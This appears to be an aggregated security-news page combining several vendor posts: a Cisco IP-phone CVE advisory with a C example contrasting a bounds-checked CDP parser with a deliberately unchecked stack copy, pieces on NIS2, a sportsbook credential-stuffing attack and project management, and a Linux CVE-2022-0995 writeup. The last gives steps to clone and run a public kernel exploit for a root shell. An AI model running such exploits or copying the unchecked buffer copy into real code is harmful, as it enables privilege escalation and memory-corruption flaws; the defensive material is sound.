Finding Cisco 7800 and 8800 series IP phone assets on your network

Cisco recently published details of a vulnerability affecting its 7800 and 8800 series IP (VoIP) phones. These phones are sold under many different model numbers and can be found in businesses and organizations of all sizes. Originally reported to Cisco by Qian Chen of the Codesafe Team of Legendsec at QI-ANXIN Group, the vulnerability requires no authentication to exploit and can give attackers remote code execution and/or denial-of-service (DoS) capabilities.

What is the impact?

Cisco assigned a CVSS “high” rating to this vulnerability (tracked as CVE-2022-20968) and has acknowledged that proof-of-concept exploit code exists. The firmware of all 7800 and 8800 series IP phones (with the lone exception of the Cisco Wireless IP Phone 8821) contains the vulnerability, which resides in the input validation of received Cisco Discovery Protocol (CDP) packets. An attacker on the same VLAN or network segment as a vulnerable device can send specially crafted CDP packets to trigger a stack overflow, resulting in a denial-of-service condition or potential code execution. Because CDP is a layer 2 protocol, the attacker must be adjacent to the phone; the flaw is not reachable across routed networks.

Are updates available?

Every firmware release for the 7800 and 8800 series phones up to and including 14.2 contains this vulnerability (CVE-2022-20968). Cisco has not yet released fixed firmware; the patched release, currently expected to be version 14.2(1), is planned for next month (January 2023).

In the meantime, Cisco does offer the following mitigation for vulnerable IP phones:

Administrators may disable Cisco Discovery Protocol on affected IP Phone 7800 and 8800 Series devices. Devices will then use LLDP for discovery of configuration data such as voice VLAN, power negotiation, and so on. This is not a trivial change and will require diligence on behalf of the enterprise to evaluate any potential impact to devices as well as the best approach to deploy this change in their enterprise.

You can find the full details around this mitigation in the associated Cisco Security Advisory (see “Workarounds” section).

How do I find potentially vulnerable Cisco 7800 and 8800 series IP phone assets with runZero?

From the Asset Inventory, use the following pre-built query to locate Cisco 7800 and 8800 series IP phone assets which may need remediation:

type:"IP Phone" and (hw:"Cisco CP-78" or hw:"Cisco CP-88")

As always, any prebuilt queries are available from our Queries Library. Check out the library for other useful inventory queries.
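
The C program below is an added example, not code from the runZero post or from Cisco. It shows the two sides of the advisory in one place: a CDP payload parser that checks every TLV length against the bytes actually present before copying anything (the input validation the affected firmware lacks), with the unchecked copy-into-a-stack-buffer pattern beside it for contrast, and a model check on the extracted Platform TLV that mirrors the hw:"Cisco CP-78" / hw:"Cisco CP-88" prefixes of the query above. The sample payloads are constructed, the Platform string formats ("Cisco IP Phone 8845", "Cisco CP-8845") are assumptions about what the phones advertise, and the check deliberately drops the 8821, which a bare CP-88 prefix would otherwise match even though Cisco lists it as unaffected.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CDP_HDR_LEN       4       /* version(1) + TTL(1) + checksum(2) */
#define CDP_TLV_DEVICE_ID 0x0001
#define CDP_TLV_PLATFORM  0x0006
#define MAX_STR           64

struct cdp_info { char device_id[MAX_STR]; char platform[MAX_STR]; int tlv_count; };

/* The pattern behind the advisory's "stack overflow": the on-wire TLV length drives a
 * memcpy into a fixed-size stack buffer. Shown for contrast only; nothing here calls it. */
void copy_tlv_unchecked(const uint8_t *val, size_t len)
{
    char buf[MAX_STR];
    memcpy(buf, val, len);      /* attacker-controlled len: overflows buf when len >= MAX_STR */
    buf[len] = '\0';
}

/* Hardened copy: refuse any value that does not fit together with its terminator. */
static bool copy_tlv_string(char *dst, size_t dst_len, const uint8_t *val, size_t len)
{
    if (len >= dst_len) return false;
    memcpy(dst, val, len);
    dst[len] = '\0';
    return true;
}

/* Parse a CDP payload (the bytes after the LLC/SNAP header). Every TLV length is checked
 * against the bytes actually present before it is used. Returns the number of TLVs
 * walked, or -1 if the payload is malformed. */
int cdp_parse(const uint8_t *pkt, size_t pkt_len, struct cdp_info *info)
{
    memset(info, 0, sizeof *info);
    if (pkt_len < CDP_HDR_LEN || (pkt[0] != 1 && pkt[0] != 2)) return -1;  /* CDP v1 or v2 */
    size_t off = CDP_HDR_LEN;
    while (off < pkt_len) {
        if (pkt_len - off < 4) return -1;                       /* truncated TLV header */
        uint16_t type = (uint16_t)((pkt[off] << 8) | pkt[off + 1]);
        uint16_t tlen = (uint16_t)((pkt[off + 2] << 8) | pkt[off + 3]);
        if (tlen < 4 || tlen > pkt_len - off) return -1;        /* length includes header, must fit */
        const uint8_t *val = pkt + off + 4;
        size_t vlen = tlen - 4;
        if (type == CDP_TLV_DEVICE_ID &&
            !copy_tlv_string(info->device_id, sizeof info->device_id, val, vlen)) return -1;
        if (type == CDP_TLV_PLATFORM &&
            !copy_tlv_string(info->platform, sizeof info->platform, val, vlen)) return -1;
        info->tlv_count++;                                      /* other TLV types are skipped */
        off += tlen;
    }
    return info->tlv_count;
}

/* Mirrors the runZero query's hw:"Cisco CP-78" / hw:"Cisco CP-88" prefixes. Assumption: the
 * Platform TLV reads "Cisco IP Phone 88xx" or "Cisco CP-88xx"; both forms are accepted. */
bool is_78xx_88xx_phone(const char *platform)
{
    const char *p = platform;
    if (strncmp(p, "Cisco ", 6) == 0) p += 6;
    if (strncmp(p, "IP Phone ", 9) == 0) p += 9;
    else if (strncmp(p, "CP-", 3) == 0) p += 3;
    else return false;
    if (!((p[0] == '7' || p[0] == '8') && p[1] == '8' &&
          isdigit((unsigned char)p[2]) && isdigit((unsigned char)p[3]))) return false;
    /* Cisco excepts the Wireless IP Phone 8821, which a bare CP-88 prefix would still match. */
    return strncmp(p, "8821", 4) != 0;
}

/* Constructed payloads, not captures. */
static const uint8_t SAMPLE_CDP[] = {
    0x02, 0xb4, 0x00, 0x00,                      /* v2, TTL 180, checksum (not verified here) */
    0x00, 0x01, 0x00, 0x13,                      /* Device ID TLV, len 19 = 4 + 15 */
    'S','E','P','0','0','1','1','2','2','3','3','4','4','5','5',
    0x00, 0x06, 0x00, 0x17,                      /* Platform TLV, len 23 = 4 + 19 */
    'C','i','s','c','o',' ','I','P',' ','P','h','o','n','e',' ','8','8','4','5',
};
/* Platform TLV claims 512 bytes but only 4 follow: the shape of a crafted packet. */
static const uint8_t OVERSIZED_CDP[] = { 0x02, 0xb4, 0x00, 0x00, 0x00, 0x06, 0x02, 0x00, 'X','X','X','X' };
/* TLV length 3 cannot even hold its own 4-byte header. */
static const uint8_t UNDERSIZED_CDP[] = { 0x02, 0xb4, 0x00, 0x00, 0x00, 0x06, 0x00, 0x03 };

int main(void)
{
    struct cdp_info info;
    int n = cdp_parse(SAMPLE_CDP, sizeof SAMPLE_CDP, &info);
    printf("tlvs=%d device_id=%s platform=\"%s\" in_scope=%s\n", n, info.device_id,
           info.platform, is_78xx_88xx_phone(info.platform) ? "yes" : "no");
    printf("oversized TLV rejected: %s\n",
           cdp_parse(OVERSIZED_CDP, sizeof OVERSIZED_CDP, &info) < 0 ? "yes" : "no");
    printf("undersized TLV rejected: %s\n",
           cdp_parse(UNDERSIZED_CDP, sizeof UNDERSIZED_CDP, &info) < 0 ? "yes" : "no");
    return 0;
}
```

Compile with any C99 compiler and run. The parser answers a bad length by dropping the whole frame rather than truncating, so a malformed advertisement surfaces as a rejection you can alert on instead of a silently shortened string. If your inventory tool matches the hardware field as a prefix, apply the same 8821 exclusion there before filing remediation tickets.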

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About runZero
runZero, a network discovery and asset inventory solution, was founded in 2018 by HD Moore, the creator of Metasploit. HD envisioned a modern active discovery solution that could find and identify everything on a network–without credentials. As a security researcher and penetration tester, he often employed benign ways to get information leaks and piece them together to build device profiles. Eventually, this work led him to leverage applied research and the discovery techniques developed for security and penetration testing to create runZero.

A Floor, not a Ceiling: ESET welcomes the approval of NIS2

ESET welcomes the decision of EU legislators to adopt the second Network and Information Security Directive (NIS2) aimed at strengthening cyber resilience across the Union. The new legislation comes as a response to the growing dependency of critical sectors on digitalization and their higher exposure to cyber threats.

The directive now approved replaces the NIS Directive introduced in 2016, the first EU-wide legislation on cybersecurity. NIS2 has a broader scope, covering more entities in “high criticality” sectors, in both the public and private sectors, such as energy, transport, banking, water and waste water, and other critical infrastructure, while also bringing in new obligations for entities in other “critical” sectors such as manufacturing, food, chemicals, waste management, and postal and courier services.

Enterprises classed as “high criticality” will be required to take both technical and operational measures to comply with NIS2, including incident response, supply chain security, encryption and vulnerability disclosure, adequate risk analysis, testing and auditing of cybersecurity strategies, and crisis management planning with a view to ensuring business continuity. In case of a cyber incident, these entities will also be required to submit an initial notification within 24 hours and more detailed information within 72 hours. NIS2 also introduces sanctions for non-compliance, including fines, suspension of certification and personal liability for those in managerial positions, in line with national laws.

Finally, the directive establishes the European Cyber Crises Liaison Organization Network, EU-CyCLONe, to enable cooperation between national agencies and authorities in charge of cybersecurity, and each Member State will also be required to clearly identify a single point of contact to report cyber incidents.

Are SMEs also obliged to comply?

NIS2 establishes “the application of the size-cap rule, whereby all medium and large enterprises, as defined by Commission Recommendation 2003/361/EC, that operate within the sectors or provide the type of services covered by this Directive, fall within its scope”. It excludes small and micro enterprises from the new rules, with some exceptions, for example SMEs providing electronic communications networks or publicly available electronic communications services, trust service providers, or top-level domain (TLD) name registries.

Small and medium-sized enterprises are increasingly becoming the target of supply chain attacks due to limited security resources. Such supply chain attacks can have a cascading effect on entities to which they provide supplies. Member States should, through their national cybersecurity strategies, help small and medium-sized enterprises to address the challenges faced in their supply chains. Member States should have a point of contact for small and medium-sized enterprises at national or regional level, which either provides guidance and assistance to small and medium-sized enterprises or directs them to the appropriate bodies for guidance and assistance with regard to cybersecurity related issues.

In March last year, the European DIGITAL SME Alliance, the EU’s largest SME network in the field of ICT, published its position paper for the consultation on the NIS2 proposal, welcoming the new directive but also warning of its indirect impact on SMEs.

In conversation with ESET, James Philpot, Project Manager at DIGITAL SME, notes that the first step SMEs should be taking to “understand specific needs to boost their cybersecurity practices” is looking at their “national cybersecurity center and ENISA’s guides and recommendations”. However, “it might be easier or harder” to get the right information as “different Member States provide different resources”. Nonetheless, NIS2 “mandates that States should provide support and resources” mainly when it comes to getting a detailed understanding of the scope of this legislation “and whether their customers will be subject to it”, which will “help plan ahead”.

Turning challenges into opportunities.

“Downstream suppliers are likely to be the most disrupted”, and it can be challenging for some companies to have the needed technical capabilities but mainly to understand “reporting requirements and how NIS2 interplays with other legislation”, explained Philpot.

“But in a more general sense, we have to be positive about it”, and “efforts to improve the level of cybersecurity in European businesses are generally welcomed”. The only caveat, alerts Philpot, is the level of “implementation and support, and how that is managed, that will ultimately be the difference between the legislation helping SMEs and the legislation being regulatory overburden”.

Moreover, ESET and DIGITAL SME are convinced that this new framework might be an opportunity. “Yes, it can be an opportunity, there are technical solutions available in Europe to provide the level of cybersecurity required”, but companies need to avoid “looking for the biggest name or cheapest offer, which tends to come from outside of Europe”. This is why it is so important to “link support and resources” to “leverage this legislation and to strengthen European innovation”.

SMEs can also reach out to their local CSIRTs to mitigate some of the deficiencies of other national bodies, or take advantage of resources such as the DIGITAL SME/SBS guide, the DIGITAL SME Guide on Information Security Controls, or cybersecurity certification schemes.

Moving towards safer enterprises.
ESET’s SMB Digital Security Sentiment Report, published just last month, found that while 83% of SMEs believe cyber warfare is a very real threat and 71% had moderate to high confidence in their ability to investigate the root cause of cyberattacks, 43% consider employees’ lack of awareness the leading cause for concern, while actual uptake of EDR (endpoint detection and response) solutions, which specifically assist in this area, was only 32%.

As Philpot also notes in the conversation with ESET, “the impacts of cyber incidents are well known” to SMEs: data leaks, considerable financial impact and loss of customer confidence. So “in a more general sense, we have to be positive” about NIS2; at the very least, this directive will play an important awareness role, even for companies that “aren’t required to comply, they may develop greater awareness”.

NIS2 will become applicable once the EU Member States transpose the directive into national law, which they must do by 17 October 2024. Nevertheless, organizations might want to be ready sooner rather than later, not only to be on time with implementation but also to test good practices in incident handling, control policies and reporting methodologies. Above all, NIS2 defines a minimum common level of cybersecurity in Europe, one that should be seen as the floor under our feet, not as a ceiling.


About ESET
For 30 years, ESET® has been developing industry-leading IT security software and services for businesses and consumers worldwide. With solutions ranging from endpoint security to encryption and two-factor authentication, ESET’s high-performing, easy-to-use products give individuals and businesses the peace of mind to enjoy the full potential of their technology. ESET unobtrusively protects and monitors 24/7, updating defenses in real time to keep users safe and businesses running without interruption. Evolving threats require an evolving IT security company. Backed by R&D facilities worldwide, ESET became the first IT security company to earn 100 Virus Bulletin VB100 awards, identifying every single “in-the-wild” malware without interruption since 2003.

Online Casino Heist Shreds Confidence in Cybersecurity

Nature abhors a vacuum, and so do cybercriminals. Whenever a new corner of the digital economy emerges, hackers are swift to infiltrate and exploit it to the fullest extent possible. It’s a law of digital life by now. To see it validated once again, just look at what happened to DraftKings last week.

Users of the popular sport-betting app found themselves locked out of their accounts. Upon getting back in, some found that funds had been drained away, totaling $300,000 across all those affected.

This is hardly the biggest hack of late, nor is it the first time that an online sportsbook has been a target. It won’t be the last time, either. In fact, FanDuel, a competing sportsbook, has also reported increased malicious activity though no confirmed attacks. More likely this is an early instance of what will be a long, sustained wave of attacks on online gambling.

Why? For the simple reason that huge (and fast-growing) sums of money slosh around in online gambling accounts – sports books recorded $3 billion in revenue through the first half of 2022, shattering previous records. Highly lucrative, these accounts are also highly vulnerable because people have yet to appreciate the risks of these accounts and take even basic cybersecurity measures. Hackers saw a vacuum waiting to be filled, and it just happened to have a pile of gold sitting inside.

Attacks like the one on DraftKings should surprise no one. Regardless, that particular attack has lessons – for both gamblers and casinos – that could keep this problem from getting much worse.

Online Gambling – Doubling Down on Risk

Criminals go where the money is located. So it’s predictable that casinos, race tracks, and betting parlors have been frequent targets for criminal activity since their inception. Not only do these locations have piles of cash on hand, but it also moves around faster and more freely than it does somewhere like a bank. Also unlike financial institutions, security standards and regulatory requirements are less strict around gambling (especially at underground operations). For all these reasons, anywhere that gamblers congregate looks like a prime candidate for theft.

Online operations are no different; they are a low-risk, high-value target. Except in the case of companies like DraftKings, both those factors are taken to the extreme. Gambling in online spaces lets more people and money collect in one place than any building could ever accommodate. The potential payout of a successful attack is much larger. At the same time, the number of ways to steal online gambling proceeds far exceeds the ways to steal real money. One takes an off-the-shelf cyber attack – the other takes Ocean’s Eleven.

The DraftKings attack is unfortunately a perfect example of the unique cyber risks that accompany online gambling. The perpetrators accessed people’s accounts using credential stuffing: they took known username/password combinations, either purchased on the dark web or stolen in a separate breach, and tried them to see which ones granted access to DraftKings accounts. Once inside, it was simple to change the bank account information and drain the funds. This means some online gamblers are using the same username and password they use for Amazon or Netflix. Most gamblers are protective of their stakes, but that same caution hasn’t migrated online yet, and neither have the robust cybersecurity standards we are used to with other kinds of online transactions. DraftKings does not require MFA, for example, which would have stopped a reused password alone from granting access.

Some of these problems will be resolved as online gambling matures. But during that same period, cyber attacks will mature as well, and hackers won’t quickly retreat from such a lucrative target. As the money flowing into sites like DraftKings keeps skyrocketing, expect the scale and audacity of attacks to do the same.

Seeing the Bigger Problem

The problems facing online gambling are similar to those facing another industry: crypto. Attacks on crypto exchanges and wallets have repeatedly made headlines, led to billions in losses, and shown all indications of getting worse. The reason why, like online gambling, is lots of money collected in one place – or flying around anonymously – without strong (or even basic) security protections in place.

This strikes me as indicative of a larger problem affecting most aspects of our expanding digital lives, which is a failure to realistically anticipate risks and plan for cyber attacks. With the DraftKings hack and so many of the crypto examples, the level of caution and preparation – on the part of both users and developers – was severely out of step with the risk. To put it differently, we wandered obliviously into the jaws of a tiger. Worst of all, we already knew the tiger was there.

I don’t blame users for recycling their passwords or even blame DraftKings for making MFA optional. The real culprit is a culture that’s still lax on cybersecurity and content to fix problems after the fact. Anyone could have predicted that online gambling accounts or wallets full of digital currency would attract an immediate and aggressive onslaught from hackers. But could anyone explain why security around those targets started off (and still remains) so over-matched?

The answer is complicated, no doubt. And I don’t claim to have the whole thing. What I do know is that if hackers are waltzing into obviously sensitive accounts and making off with huge sums, cybersecurity has some serious ground to make up.

#cybersecurity #DraftKings #gambling #credentialstuffing #crypto


About VRX
VRX is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

Critical Factors for the Success of Cybersecurity Projects

Not investing in cybersecurity is a mistake that can cause incalculable losses for organizations. Since the Covid-19 pandemic and the shift to remote work, exposure to digital threats has grown to alarming levels, creating the need for effective cybersecurity projects across the most diverse industries.

Developing cybersecurity projects is challenging. With that in mind, this article presents the critical factors for the success of this type of initiative.

Senior Management Support

In a company, every project of real significance must be approved or rejected by senior management. If the decision is to implement the project, the engagement and cooperation of leaders are essential for it to succeed. The adoption of cybersecurity measures is no different.

Gaining the support of senior management is one of the critical factors for the successful implementation of a cybersecurity plan. If a company’s management knows and trusts the project’s ability to meet the demands of its business, it will be ready to adopt it.

User Awareness

Presenting the purpose and importance of cybersecurity projects is an essential part of informing users and raising their awareness. To engage employees and show how their actions can affect everyone in a digital environment, training should use practical examples of the dangers posed by cyber risks and show how to prevent them using the tools and solutions provided by the project.

Moreover, teams should be aware of Incident Response, Disaster Recovery, and Business Continuity Plans. In this way, it will be possible to create a greater sense of responsibility and engagement in all users, and not only in those specifically assigned to the company’s IT area.

Monitoring and Control of Scope, Term, and Budget

The scope of a project maps all the work necessary for its progress and completion: the defined goals and each stage of implementation. Monitoring and controlling the scope means staying alert to any changes that arise during the project, and deciding which are necessary or dispensable, which fit within the available budget and schedule, and which have the approval and agreement of everyone involved.

Each of these changes must also be tracked, so that time and staff can be assigned to tasks efficiently and the modifications do not derail the project.
It is also important to create a project scope statement and make sure all stakeholders understand it. When dealing with external clients, a policy covering changes and restrictions is also necessary.

Conclusion

In this article, you found out what the critical factors are for developing successful cybersecurity projects. Did you like our content? Then share it with someone else interested in the topic.


About Segura®
Segura® strives to ensure companies’ sovereignty over privileged actions and information. To this end, we work against data theft through traceability of administrator actions on networks, servers, databases and a multitude of devices. In addition, we pursue compliance with auditing requirements and the most demanding standards, including PCI DSS, Sarbanes-Oxley, ISO 27001 and HIPAA.

Out-of-Bounds (OOB) Write Memory Flaw: CVE-2022-0995

Introduction:

An out-of-bounds (OOB) memory write flaw was found in the Linux kernel’s watch_queue event notification subsystem. This flaw can overwrite parts of the kernel state, potentially allowing a local user to gain privileged access or cause a denial of service on the system.

Vulnerability Release Time:
  • 2022-03-14 11:43 UTC

Vulnerability Impact & Type:
  • Successful exploitation of this vulnerability could lead to disclosure of sensitive information, addition or modification of data, or denial of service (DoS).
  • Local privilege escalation

Affected Products:
  • Linux kernel versions up to and including 5.17-rc7 (the watch_queue subsystem must be compiled in). Distribution kernels may carry the fix as a backport, so check the vendor advisory rather than relying on the version number alone.

Fixed Versions:
  • Kernel 5.17-rc8 and later

Weakness (CWE-787, Out-of-bounds Write): The software writes data past the end, or before the beginning, of the intended buffer. This typically occurs when a pointer or index is incremented or decremented to a position beyond the bounds of the buffer, or when pointer arithmetic results in a position outside the valid memory region. The result may be corruption of sensitive information, a crash, or code execution.

CVSS v3.1 (the impact and complexity fields below are given in CVSS v2 vocabulary):
  • Base Score: 7.2 (High)
  • CWE ID: 787
  • Vulnerability type: Out-of-bounds write (memory corruption)
  • Gained Access: None
  • Authentication: None
  • Confidentiality Impact: Complete
  • Integrity Impact: Complete
  • Availability Impact: Complete
  • Access Complexity: Low

Mitigation: Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to a widespread installation base, or stability.

Technical Analysis / Exploits:

1. Log in to the Linux machine as an unprivileged user and note the running kernel version.
2. Download the public exploit from its GitHub repository:
   git clone https://github.com/Bonfee/CVE-2022-0995.git
3. Change into the cloned directory:
   cd CVE-2022-0995
4. Run the exploit (if the repository provides only source, build it first as its README describes). When it completes, you have a root shell:
   ./exploit
5. From that shell, start a root bash session:
   /bin/bash
You are now in a root bash shell and can do everything the root user can.

References:
  • https://github.com/Bonfee/CVE-2022-0995
  • https://nvd.nist.gov/vuln/detail/CVE-2022-0995
  • https://access.redhat.com/security/cve/cve-2022-0995

#CVE-2022-0995 #Linux #kernel #Out-of-Bound(OOB)


